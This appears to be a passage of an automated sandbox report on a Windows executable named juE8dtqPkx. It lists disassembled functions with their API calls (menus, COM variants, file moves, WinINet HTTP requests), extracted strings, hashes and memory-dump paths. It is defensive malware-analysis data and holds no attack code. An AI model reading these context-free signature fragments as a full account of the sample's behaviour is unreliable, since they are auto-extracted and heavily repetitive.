                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 0-1603158881
                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                    • String ID: close all$#v
                                                    • API String ID: 4174999648-3101823635
                                                    • Opcode ID: 0bb321770139098455153e9cf500394e2a6da35f1d00dd0e11ea7e6d1323a696
                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                    • Opcode Fuzzy Hash: 0bb321770139098455153e9cf500394e2a6da35f1d00dd0e11ea7e6d1323a696
                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                    APIs
                                                    • CreateMenu.USER32 ref: 00448603
                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                    • IsMenu.USER32(?), ref: 004486AB
                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0
                                                    • API String ID: 161812096-4108050209
                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78813ac5c5779212d88e11dbc4805cbe96c27163f172e50d1cd09915c6bfa1a3
                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                    • Opcode Fuzzy Hash: 78813ac5c5779212d88e11dbc4805cbe96c27163f172e50d1cd09915c6bfa1a3
                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                    • String ID:
                                                    • API String ID: 978794511-0
                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memcmp
                                                    • String ID: '$\$h
                                                    • API String ID: 2205784470-1303700344
                                                    • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                    • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                    • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                    • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                    Strings
                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                    • API String ID: 2441338619-1568723262
                                                    • Opcode ID: f183c9f019c246951a22bf959abcf8646146e2a0098e96658a8d7f803f4cbf54
                                                    • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                    • Opcode Fuzzy Hash: f183c9f019c246951a22bf959abcf8646146e2a0098e96658a8d7f803f4cbf54
                                                    • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID: @COM_EVENTOBJ
                                                    • API String ID: 327565842-2228938565
                                                    • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                    • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                    APIs
                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                    • String ID: H
                                                    • API String ID: 3613100350-2852464175
                                                    • Opcode ID: 5eaced02bd808bb80e8832f800070633c5db503b85e11b56c521c17bfe1438c7
                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                    • Opcode Fuzzy Hash: 5eaced02bd808bb80e8832f800070633c5db503b85e11b56c521c17bfe1438c7
                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1291720006-3916222277
                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                    • String ID: crts
                                                    • API String ID: 586820018-3724388283
                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
